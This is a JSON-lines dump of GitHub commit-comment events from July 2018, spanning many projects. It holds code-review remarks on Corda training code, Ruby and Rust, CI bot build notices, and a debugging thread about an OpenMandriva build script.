{"id":"8018624963","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29834411,"position":null,"line":null,"path":null,"commit_id":"73281ffba303cbd55bfa8f4e7e5646843f39866d","created_at":"2018-07-25T19:44:07Z","updated_at":"2018-07-25T19:44:07Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.png)</a>\n"}},"created_at":"2018-07-25T19:44:07Z"}
{"id":"8018626681","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834424,"position":45,"line":45,"path":"java-source/src/main/java/net/corda/training/contract/IOUContract.java","commit_id":"ad633789045d2e31d52185bb1b8f6702a6031e38","created_at":"2018-07-25T19:44:27Z","updated_at":"2018-07-25T19:44:27Z","author_association":"NONE","body":"Editorial Comment: this is the first piece of syntax where I think Java is cleaner than Kotlin"}},"created_at":"2018-07-25T19:44:27Z"}
{"id":"8018630139","type":"CommitCommentEvent","actor":{"login":"tpgxyz"},"repo":{"name":"OpenMandrivaSoftware/docker-publish-worker"},"payload":{"comment":{"id":29834456,"position":20,"line":185,"path":"scripts/mdv/build.sh","commit_id":"c1edac91074baf982e8b31a20b52d0329dd8c57f","created_at":"2018-07-25T19:45:07Z","updated_at":"2018-07-25T19:45:07Z","author_association":"CONTRIBUTOR","body":"@berolinux Please take a look on this.Somehow it takes all the files and crates them as arch directories\r\nhttp://abf-downloads.openmandriva.org/cooker/repository/\r\n../\r\nREADME.md/                                         16-Jul-2018 07:48                   -\r\nSRPMS/                                             17-Feb-2016 18:40                   -\r\naarch64/                                           24-Nov-2016 01:47                   -\r\narmv7hl/                                           24-Nov-2016 01:47                   -\r\narmv7hnl/                                          24-Nov-2016 01:47                   -\r\narmv7l/                                            24-Nov-2016 01:47                   -\r\nbuild.sh/                                          16-Jul-2018 07:48                   -\r\nextract_filename.sh/                               16-Jul-2018 07:48                   -\r\ni586/                                              24-Nov-2016 01:47                   -\r\ni686/                                              24-Nov-2016 01:47                   -\r\nrollback.sh/                                       16-Jul-2018 07:48                   -\r\nx86_64/                                            24-Nov-2016 01:47                   -\r\nznver1/   "}},"created_at":"2018-07-25T19:45:07Z"}
{"id":"8018631638","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29834478,"position":320,"line":391,"path":"Lesson_4/lib/main_menu.rb","commit_id":"153c9b5f3efec473b79cdf22a878ed1c4cc56f40","created_at":"2018-07-25T19:45:24Z","updated_at":"2018-07-25T19:45:24Z","author_association":"NONE","body":"у тебя идет дублирование метода\r\nв 387 и в 391 строках определяется метод `create_wagon`\r\nнужно оставить только один )))"}},"created_at":"2018-07-25T19:45:24Z"}
{"id":"8018633890","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834494,"position":50,"line":50,"path":"java-source/src/main/java/net/corda/training/contract/IOUContract.java","commit_id":"ad633789045d2e31d52185bb1b8f6702a6031e38","created_at":"2018-07-25T19:45:52Z","updated_at":"2018-07-25T19:45:52Z","author_association":"NONE","body":"Two things:\r\n1) Split this into too lines, best to make things readable without scrolling\r\n2) Can you link me your research on how this stream/map/collect thing is best practice"}},"created_at":"2018-07-25T19:45:52Z"}
{"id":"8018634366","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/conda-build-feedstock"},"payload":{"comment":{"id":29834498,"position":null,"line":null,"path":null,"commit_id":"f1187fa37090d8067a532bd9f988f159c285e81c","created_at":"2018-07-25T19:45:58Z","updated_at":"2018-07-25T19:45:58Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @cj-wright was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-25T19:45:58Z"}
{"id":"8018634773","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834501,"position":56,"line":56,"path":"java-source/src/main/java/net/corda/training/contract/IOUContract.java","commit_id":"ad633789045d2e31d52185bb1b8f6702a6031e38","created_at":"2018-07-25T19:46:03Z","updated_at":"2018-07-25T19:46:03Z","author_association":"NONE","body":"Commands.Settle"}},"created_at":"2018-07-25T19:46:03Z"}
{"id":"8018635887","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29834507,"position":null,"line":null,"path":null,"commit_id":"46da8b504c216d09594f76ef5f9cb15161061913","created_at":"2018-07-25T19:46:17Z","updated_at":"2018-07-25T19:46:17Z","author_association":"CONTRIBUTOR","body":"https://github.com/xrOxygen/xray-oxygen/commit/97694d5a97bf97a3f942f247852bd7939fc5cd3a\r\n\r\nПо моему, это более правильный вариант. Ибо от all_of тут никакого прока... "}},"created_at":"2018-07-25T19:46:17Z"}
{"id":"8018637033","type":"CommitCommentEvent","actor":{"login":"CamiloB"},"repo":{"name":"timgrossmann/InstaPy"},"payload":{"comment":{"id":29834513,"position":null,"line":null,"path":null,"commit_id":"362fc77bfb5df1d149173e78f334f9d85bdcfcc7","created_at":"2018-07-25T19:46:32Z","updated_at":"2018-07-25T19:46:32Z","author_association":"NONE","body":"hi on the file but i dont see de - in any of the code how can i see it?"}},"created_at":"2018-07-25T19:46:32Z"}
{"id":"8018639135","type":"CommitCommentEvent","actor":{"login":"noorka"},"repo":{"name":"noorka/SURF2018"},"payload":{"comment":{"id":29834521,"position":null,"line":null,"path":null,"commit_id":"416b4fa3e58e52eca1af45b93d0d038ffac7f8c7","created_at":"2018-07-25T19:46:57Z","updated_at":"2018-07-25T19:46:57Z","author_association":"OWNER","body":"This is what TAPAS says about who the publisher is: \"the person or organization responsible for the creation of TEI edition, and who has rights over its production and/or distribution\" So is that still TAPAS or is that actually me?"}},"created_at":"2018-07-25T19:46:57Z"}
{"id":"8018640432","type":"CommitCommentEvent","actor":{"login":"mbebenita"},"repo":{"name":"xiph/rav1e"},"payload":{"comment":{"id":29834523,"position":13,"line":38,"path":"src/bin/rav1e.rs","commit_id":"a79d08f6e67595d09f0b801f245ce24b33103686","created_at":"2018-07-25T19:47:13Z","updated_at":"2018-07-25T19:47:13Z","author_association":"COLLABORATOR","body":"I think you can write `None, None, None, None, None, None, None, None]` as `[None; 8]`."}},"created_at":"2018-07-25T19:47:13Z"}
{"id":"8018641613","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29834529,"position":null,"line":null,"path":null,"commit_id":"73281ffba303cbd55bfa8f4e7e5646843f39866d","created_at":"2018-07-25T19:47:26Z","updated_at":"2018-07-25T19:47:26Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-25T19:47:26Z"}
{"id":"8018642328","type":"CommitCommentEvent","actor":{"login":"christopheleray"},"repo":{"name":"RainbowQuartz/projet_s4_mercredi_moocademy"},"payload":{"comment":{"id":29834533,"position":null,"line":null,"path":null,"commit_id":"7b2f83d11a1bed7203f220216edbec89db5b1849","created_at":"2018-07-25T19:47:35Z","updated_at":"2018-07-25T19:47:35Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-25T19:47:35Z"}
{"id":"8018642644","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834534,"position":28,"line":28,"path":"java-source/src/main/java/net/corda/training/flow/IOUIssueFlow.java","commit_id":"ad633789045d2e31d52185bb1b8f6702a6031e38","created_at":"2018-07-25T19:47:38Z","updated_at":"2018-07-25T19:47:38Z","author_association":"NONE","body":"Why did you have to make a static inner class?"}},"created_at":"2018-07-25T19:47:38Z"}
{"id":"8018642927","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29834538,"position":null,"line":null,"path":null,"commit_id":"9d840aa373cbd8a0192880e6fecc18b74ebd9db1","created_at":"2018-07-25T19:47:42Z","updated_at":"2018-07-25T19:47:42Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-546](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-546).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-546-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-25T19:47:42Z"}
{"id":"8018645486","type":"CommitCommentEvent","actor":{"login":"aslamazlu"},"repo":{"name":"aslamazlu/Aslamazlu"},"payload":{"comment":{"id":29834548,"position":null,"line":null,"path":null,"commit_id":"d67fa789eda7a6bf4f9691ceeafb4fc8106fc11e","created_at":"2018-07-25T19:48:14Z","updated_at":"2018-07-25T19:48:14Z","author_association":"OWNER","body":"- Tg_bot"}},"created_at":"2018-07-25T19:48:14Z"}
{"id":"8018646560","type":"CommitCommentEvent","actor":{"login":"Bomper"},"repo":{"name":"jonchurch/tradingview-js-api-tutorial"},"payload":{"comment":{"id":29834553,"position":41,"line":41,"path":"part1/src/components/TVChartContainer/api/historyProvider.js","commit_id":"a43afddfbaabc6bfa6fcbea0b63ebe8042fac5fa","created_at":"2018-07-25T19:48:29Z","updated_at":"2018-07-25T19:48:29Z","author_association":"NONE","body":"Why not volumeto? What do these volumes mean?"}},"created_at":"2018-07-25T19:48:29Z"}
{"id":"8018648046","type":"CommitCommentEvent","actor":{"login":"fkarg"},"repo":{"name":"SoPra18-07/Singularity"},"payload":{"comment":{"id":29834557,"position":23,"line":373,"path":"Singularity/Singularity/Screen/ScreenClasses/UserInterfaceScreen.cs","commit_id":"733b66c7a3c7d0fbaaf6c2d31b5f1bd5e7639c61","created_at":"2018-07-25T19:48:49Z","updated_at":"2018-07-25T19:48:49Z","author_association":"MEMBER","body":"can't see how you fixed this one"}},"created_at":"2018-07-25T19:48:49Z"}
{"id":"8018648224","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29834558,"position":null,"line":null,"path":null,"commit_id":"6c41e987b69cbebbeed562c6b804d7db2abc8ea9","created_at":"2018-07-25T19:48:51Z","updated_at":"2018-07-25T19:48:51Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#pr-46](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#pr-46).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-46-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-25T19:48:51Z"}
{"id":"8018649715","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834559,"position":28,"line":28,"path":"java-source/src/main/java/net/corda/training/flow/IOUIssueFlow.java","commit_id":"ad633789045d2e31d52185bb1b8f6702a6031e38","created_at":"2018-07-25T19:49:11Z","updated_at":"2018-07-25T19:49:11Z","author_association":"NONE","body":"I see that the example app did it this way. Can you provide backing on why? \r\n\r\nRename inner class to Initiator in the same standards as the example app."}},"created_at":"2018-07-25T19:49:11Z"}
{"id":"8018650862","type":"CommitCommentEvent","actor":{"login":"dsh2dsh"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29834561,"position":null,"line":null,"path":null,"commit_id":"46da8b504c216d09594f76ef5f9cb15161061913","created_at":"2018-07-25T19:49:25Z","updated_at":"2018-07-25T19:49:25Z","author_association":"COLLABORATOR","body":"@ForserX совершенно. Но какая разница-то, all_of или for? Суть-то от этого не меняется же?\r\n\r\nУ тебя что-то странное получилось. Оно скомпилировалось?\r\n\r\n"}},"created_at":"2018-07-25T19:49:25Z"}
{"id":"8018651384","type":"CommitCommentEvent","actor":{"login":"fkarg"},"repo":{"name":"SoPra18-07/Singularity"},"payload":{"comment":{"id":29834565,"position":14,"line":363,"path":"Singularity/Singularity/Screen/ScreenClasses/UserInterfaceScreen.cs","commit_id":"733b66c7a3c7d0fbaaf6c2d31b5f1bd5e7639c61","created_at":"2018-07-25T19:49:31Z","updated_at":"2018-07-25T19:49:31Z","author_association":"MEMBER","body":"why use the old version? did it break yet? (0 is not a valid graph id either way, so I'd be in favor of keeping it)"}},"created_at":"2018-07-25T19:49:31Z"}
{"id":"8018651841","type":"CommitCommentEvent","actor":{"login":"asutula"},"repo":{"name":"textileio/react-native-background-upload"},"payload":{"comment":{"id":29834568,"position":17,"line":217,"path":"ios/VydiaRNFileUploader.m","commit_id":"7adc45e93e60831662bdd4c6d68ce150107c2248","created_at":"2018-07-25T19:49:36Z","updated_at":"2018-07-25T19:49:36Z","author_association":"MEMBER","body":"Unfortunately this isn't going to work for actual background uploads, as the deleted comment above says. "}},"created_at":"2018-07-25T19:49:36Z"}
{"id":"8018652346","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834572,"position":44,"line":44,"path":"java-source/src/main/java/net/corda/training/flow/IOUIssueFlow.java","commit_id":"ad633789045d2e31d52185bb1b8f6702a6031e38","created_at":"2018-07-25T19:49:42Z","updated_at":"2018-07-25T19:49:42Z","author_association":"NONE","body":"Simplify IOUContract.Commands import"}},"created_at":"2018-07-25T19:49:42Z"}
{"id":"8018654838","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834580,"position":48,"line":48,"path":"java-source/src/main/java/net/corda/training/flow/IOUIssueFlow.java","commit_id":"ad633789045d2e31d52185bb1b8f6702a6031e38","created_at":"2018-07-25T19:50:13Z","updated_at":"2018-07-25T19:50:13Z","author_association":"NONE","body":"whitespace"}},"created_at":"2018-07-25T19:50:13Z"}
{"id":"8018657695","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29834586,"position":null,"line":null,"path":null,"commit_id":"82c323e21927a43e41c30426fce2b8e28c437fc1","created_at":"2018-07-25T19:50:50Z","updated_at":"2018-07-25T19:50:50Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [fixcaching](https://fixcaching-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/82c323e21927a43e41c30426fce2b8e28c437fc1/.circleci/config.yml)\n"}},"created_at":"2018-07-25T19:50:50Z"}
{"id":"8018658480","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29834588,"position":320,"line":391,"path":"Lesson_4/lib/main_menu.rb","commit_id":"153c9b5f3efec473b79cdf22a878ed1c4cc56f40","created_at":"2018-07-25T19:50:59Z","updated_at":"2018-07-25T19:50:59Z","author_association":"NONE","body":"ага... в исправленной версии уже учел )"}},"created_at":"2018-07-25T19:50:59Z"}
{"id":"8018659850","type":"CommitCommentEvent","actor":{"login":"TingPing"},"repo":{"name":"flathub/org.gnome.chess"},"payload":{"comment":{"id":29834595,"position":null,"line":null,"path":null,"commit_id":"0bbb749548679a52a4438d94034739d443b56eef","created_at":"2018-07-25T19:51:16Z","updated_at":"2018-07-25T19:51:16Z","author_association":"MEMBER","body":"Done."}},"created_at":"2018-07-25T19:51:16Z"}
{"id":"8018660293","type":"CommitCommentEvent","actor":{"login":"asutula"},"repo":{"name":"textileio/react-native-background-upload"},"payload":{"comment":{"id":29834597,"position":17,"line":217,"path":"ios/VydiaRNFileUploader.m","commit_id":"7adc45e93e60831662bdd4c6d68ce150107c2248","created_at":"2018-07-25T19:51:22Z","updated_at":"2018-07-25T19:51:22Z","author_association":"MEMBER","body":"Background uploads have to be file based, that's how they are able to be executed in a separate process (not your app process). The way this is written now, the request data just exists in memory and disappears if the app is suspended/terminated."}},"created_at":"2018-07-25T19:51:22Z"}
{"id":"8018660727","type":"CommitCommentEvent","actor":{"login":"berolinux"},"repo":{"name":"OpenMandrivaSoftware/docker-publish-worker"},"payload":{"comment":{"id":29834601,"position":20,"line":185,"path":"scripts/mdv/build.sh","commit_id":"c1edac91074baf982e8b31a20b52d0329dd8c57f","created_at":"2018-07-25T19:51:27Z","updated_at":"2018-07-25T19:51:27Z","author_association":"MEMBER","body":"Hmm... looks like that's what's happening, but I don't see how that could happen unless something bogus elsewhere actually creates \"new.extract_filename.sh.list\", \"new.build.sh.list\", ... files or something...\r\n\r\n`\r\narches=\"\"\r\nfor i in \"${container_path}\"/new.*.list; do\r\n  arches=\"$arches $(basename $i .list |cut -b5-)\"\r\ndone\r\n[...]\r\nfor arch in ${arches}; do\r\n  mkdir ...\r\n`\r\n\r\nI wonder where the \"new.*.list\" files are being created, maybe the problem is there.\r\n\r\nAlso let's see if those directories get recreated after we delete them, maybe they're just a relic from an older revision."}},"created_at":"2018-07-25T19:51:27Z"}
{"id":"8018661157","type":"CommitCommentEvent","actor":{"login":"schmto"},"repo":{"name":"playmepe/nmsprime"},"payload":{"comment":{"id":29834603,"position":null,"line":null,"path":null,"commit_id":"be59b941ef406e89c5e2e9e16c31adfb9c69f73e","created_at":"2018-07-25T19:51:32Z","updated_at":"2018-07-25T19:51:32Z","author_association":"NONE","body":"quit a great job @playmepe! IMHO: we can review it and merge it into official dev branch – this could go in stable release 2.4. Really cool!"}},"created_at":"2018-07-25T19:51:32Z"}
{"id":"8018662835","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29834609,"position":null,"line":null,"path":null,"commit_id":"46da8b504c216d09594f76ef5f9cb15161061913","created_at":"2018-07-25T19:51:54Z","updated_at":"2018-07-25T19:51:54Z","author_association":"CONTRIBUTOR","body":"Я вообще не дома, на даче без студии. Там if не правильный точно. All of медленнее, ругается на него компилятор, ибо он возвращает значение, но его никто не берёт. Да и просто не есть хорошо. "}},"created_at":"2018-07-25T19:51:54Z"}
{"id":"8018663284","type":"CommitCommentEvent","actor":{"login":"spezi77"},"repo":{"name":"pixeldustproject-o/android_frameworks_base"},"payload":{"comment":{"id":29834611,"position":null,"line":null,"path":null,"commit_id":"7fd806b87134eaaed71c1406b53e4453dd78c43c","created_at":"2018-07-25T19:51:59Z","updated_at":"2018-07-25T19:51:59Z","author_association":"CONTRIBUTOR","body":"It got lost along the way:\r\nhttps://github.com/pixeldustproject-o/android_frameworks_base/commit/a2ef1574e488233bb6198eb556d572087040b4ef"}},"created_at":"2018-07-25T19:51:59Z"}
{"id":"8018663587","type":"CommitCommentEvent","actor":{"login":"cjburkey01"},"repo":{"name":"cjburkey01/ClaimChunk"},"payload":{"comment":{"id":29834612,"position":null,"line":null,"path":null,"commit_id":"69b8239857c5e347faf12723513269f3c9685576","created_at":"2018-07-25T19:52:03Z","updated_at":"2018-07-25T19:52:03Z","author_association":"OWNER","body":"Also added automatic unclaiming"}},"created_at":"2018-07-25T19:52:03Z"}
{"id":"8018663973","type":"CommitCommentEvent","actor":{"login":"thej123"},"repo":{"name":"thej123/Interview-Algo-Practice"},"payload":{"comment":{"id":29834615,"position":null,"line":null,"path":null,"commit_id":"6938f4ac8c1dcd2e51e421c5b83a766e23ea67df","created_at":"2018-07-25T19:52:08Z","updated_at":"2018-07-25T19:52:08Z","author_association":"OWNER","body":"Comment message should have been:\r\n\r\nModified rotated binary search from n+nlogn to nlogn+nlogn which is just nlogn."}},"created_at":"2018-07-25T19:52:08Z"}
{"id":"8018668801","type":"CommitCommentEvent","actor":{"login":"sanderpick"},"repo":{"name":"textileio/react-native-background-upload"},"payload":{"comment":{"id":29834624,"position":17,"line":217,"path":"ios/VydiaRNFileUploader.m","commit_id":"7adc45e93e60831662bdd4c6d68ce150107c2248","created_at":"2018-07-25T19:53:07Z","updated_at":"2018-07-25T19:53:07Z","author_association":"NONE","body":"first off, the deleted comment was a duplicate that i added."}},"created_at":"2018-07-25T19:53:07Z"}
{"id":"8018669676","type":"CommitCommentEvent","actor":{"login":"andyjimenez"},"repo":{"name":"andyjimenez/andy"},"payload":{"comment":{"id":29834625,"position":null,"line":null,"path":null,"commit_id":"59bcf1fce9ad5dd3801ee6d1550c40dd30766c7d","created_at":"2018-07-25T19:53:17Z","updated_at":"2018-07-25T19:53:17Z","author_association":"OWNER","body":"--Se agrego en listado_prestamo.ts a la funcion ionViewCanEnter() this.cargarPrestamos(this.searchTerm) para dejar la ultima busqueda.\r\n--se le agrego en database.ts en la funcion getCobroHoy date('now','localtime') para que maneje la hora del celular..resolvio lo de la validacion despues de las 7\r\n--Se agrego fecha fin al body new del recibo\r\n--Se puso en cobro.ts datos+=this.reciboPrint.cuotas(prestamo.cnt_cuotas, concepto) para volver a formato anterior de detalle de cuotas"}},"created_at":"2018-07-25T19:53:17Z"}
{"id":"8018672280","type":"CommitCommentEvent","actor":{"login":"B0RYS"},"repo":{"name":"Luka967/OgarX"},"payload":{"comment":{"id":29834630,"position":null,"line":null,"path":null,"commit_id":"f2af924ea4523e2fb3186a1495c8e6a872b5b6f7","created_at":"2018-07-25T19:53:46Z","updated_at":"2018-07-25T19:53:46Z","author_association":"NONE","body":"Hi this is a very good update, it has made my web app 100x more efficient\r\n\r\n\r\n"}},"created_at":"2018-07-25T19:53:46Z"}
{"id":"8018672676","type":"CommitCommentEvent","actor":{"login":"sanderpick"},"repo":{"name":"textileio/react-native-background-upload"},"payload":{"comment":{"id":29834633,"position":17,"line":217,"path":"ios/VydiaRNFileUploader.m","commit_id":"7adc45e93e60831662bdd4c6d68ce150107c2248","created_at":"2018-07-25T19:53:51Z","updated_at":"2018-07-25T19:53:51Z","author_association":"NONE","body":"secondly, that's what we've been doing all along... which may be related to lost connection to background stuff, although it does work most of the time, so dunno "}},"created_at":"2018-07-25T19:53:51Z"}
{"id":"8018673185","type":"CommitCommentEvent","actor":{"login":"murielsilveira"},"repo":{"name":"gabriel-lima/thinking-in-react-example"},"payload":{"comment":{"id":29834635,"position":97,"line":97,"path":"src/index.js","commit_id":"e0e39291471d81e1219ec2ea92f14cb2b09463b2","created_at":"2018-07-25T19:53:58Z","updated_at":"2018-07-25T19:53:58Z","author_association":"NONE","body":"why are you passing the `event` here?"}},"created_at":"2018-07-25T19:53:58Z"}
{"id":"8018673800","type":"CommitCommentEvent","actor":{"login":"rolandbaer"},"repo":{"name":"rolandbaer/belarus-affoltern"},"payload":{"comment":{"id":29834638,"position":null,"line":null,"path":null,"commit_id":"f76481c218dd6b2002fdde2cd146999160345624","created_at":"2018-07-25T19:54:06Z","updated_at":"2018-07-25T19:54:06Z","author_association":"OWNER","body":"closes #2 "}},"created_at":"2018-07-25T19:54:06Z"}
{"id":"8018676765","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834648,"position":63,"line":63,"path":"java-source/src/main/java/net/corda/training/flow/IOUIssueFlow.java","commit_id":"ad633789045d2e31d52185bb1b8f6702a6031e38","created_at":"2018-07-25T19:54:40Z","updated_at":"2018-07-25T19:54:40Z","author_association":"NONE","body":"Participants should already be a list. Mapping this to a list should not be necessary.\r\n\r\nThis ampping syntax is really ugly. I hope there is better way."}},"created_at":"2018-07-25T19:54:40Z"}
{"id":"8018677670","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"gkalpak/angular"},"payload":{"comment":{"id":29834651,"position":7,"line":51,"path":"packages/compiler-cli/src/ngcc/src/transform/package_transformer.ts","commit_id":"a4691cab0280ada60d77309f7bea64ceb3d74468","created_at":"2018-07-25T19:54:52Z","updated_at":"2018-07-25T19:54:52Z","author_association":"NONE","body":"But let's worry about that when people complain; or when we have tested enough libraries to see it is a problem."}},"created_at":"2018-07-25T19:54:52Z"}
{"id":"8018680287","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834655,"position":67,"line":67,"path":"java-source/src/main/java/net/corda/training/flow/IOUIssueFlow.java","commit_id":"ad633789045d2e31d52185bb1b8f6702a6031e38","created_at":"2018-07-25T19:55:24Z","updated_at":"2018-07-25T19:55:24Z","author_association":"NONE","body":"Delete commented out code, this turns into distractions."}},"created_at":"2018-07-25T19:55:24Z"}
{"id":"8018681120","type":"CommitCommentEvent","actor":{"login":"murielsilveira"},"repo":{"name":"gabriel-lima/thinking-in-react-example"},"payload":{"comment":{"id":29834660,"position":117,"line":117,"path":"src/index.js","commit_id":"e0e39291471d81e1219ec2ea92f14cb2b09463b2","created_at":"2018-07-25T19:55:34Z","updated_at":"2018-07-25T19:55:34Z","author_association":"NONE","body":"I would try to move the `onClick` handler to it's own function"}},"created_at":"2018-07-25T19:55:34Z"}
{"id":"8018682047","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29834664,"position":76,"line":76,"path":"java-source/src/main/java/net/corda/training/flow/IOUIssueFlow.java","commit_id":"ad633789045d2e31d52185bb1b8f6702a6031e38","created_at":"2018-07-25T19:55:45Z","updated_at":"2018-07-25T19:55:45Z","author_association":"NONE","body":"Why is the responder commented out? We need this implemented."}},"created_at":"2018-07-25T19:55:45Z"}
{"id":"8018683765","type":"CommitCommentEvent","actor":{"login":"qwertychouskie"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29834673,"position":null,"line":null,"path":null,"commit_id":"16e53cbf4d8bccc8e4e7a83fc198f73e48340756","created_at":"2018-07-25T19:56:05Z","updated_at":"2018-07-25T19:56:05Z","author_association":"CONTRIBUTOR","body":"I like the icons, though I agree they can look a bit out-of-place in the current GUI.  They just need a new GUI to go with them ;)\r\n\r\nhttps://jacobspctuneup.tk/STK/newgui3/mainmenu.html\r\n\r\n(Pulse effect FTW ;)\r\n\r\nIt may be better to wait to see if LCP/hellcp implements a new GUI and add the buttons with the new GUI.  The buttons were designed to fit the visual style of the new GUI, which is why they can sometimes look a bit weird in the current one.  That being said, it may be possible to adapt the out-of-place looking ones for the current GUI, especially since they are SVGs."}},"created_at":"2018-07-25T19:56:05Z"}
{"id":"8018687984","type":"CommitCommentEvent","actor":{"login":"berolinux"},"repo":{"name":"OpenMandrivaSoftware/docker-publish-worker"},"payload":{"comment":{"id":29834679,"position":20,"line":185,"path":"scripts/mdv/build.sh","commit_id":"c1edac91074baf982e8b31a20b52d0329dd8c57f","created_at":"2018-07-25T19:56:58Z","updated_at":"2018-07-25T19:56:58Z","author_association":"MEMBER","body":"Directories removed, let's see if something creates them again"}},"created_at":"2018-07-25T19:56:58Z"}
{"id":"8018688633","type":"CommitCommentEvent","actor":{"login":"AurelioSilver"},"repo":{"name":"AurelioSilver/pillarsofeternity-2-german-patch"},"payload":{"comment":{"id":29834680,"position":22,"line":22606,"path":"exported/localized/de_patch/text/game/gui.stringtable","commit_id":"0f14ad03eee5e2641ddae8bad3f06050a1cad9c7","created_at":"2018-07-25T19:57:07Z","updated_at":"2018-07-25T19:57:07Z","author_association":"OWNER","body":"Hier englischer Text?"}},"created_at":"2018-07-25T19:57:07Z"}
{"id":"8018689563","type":"CommitCommentEvent","actor":{"login":"gwolf2u"},"repo":{"name":"crdroidandroid/android_vendor_crDroidOTA"},"payload":{"comment":{"id":29834685,"position":null,"line":null,"path":null,"commit_id":"fd9c3d1a790543dd7d669e39adaf4cbdfffaf0bd","created_at":"2018-07-25T19:57:16Z","updated_at":"2018-07-25T19:57:16Z","author_association":"MEMBER","body":"@knight182 please don't commit lots of small file modifications in lots of commits \r\nalways follow the HowTo https://github.com/crdroidandroid/android_vendor_crDroidOTA/blob/8.1/README.md#how-to"}},"created_at":"2018-07-25T19:57:16Z"}
